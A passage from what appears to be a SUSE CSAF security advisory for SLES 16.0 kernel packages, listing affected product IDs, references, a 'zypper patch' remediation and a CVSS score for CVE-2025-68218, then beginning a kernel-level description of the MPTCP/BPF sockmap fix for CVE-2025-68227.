"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68218",
"url": "https://www.suse.com/security/cve/CVE-2025-68218"
},
{
"category": "external",
"summary": "SUSE Bug 1255245 for CVE-2025-68218",
"url": "https://bugzilla.suse.com/1255245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68218"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules 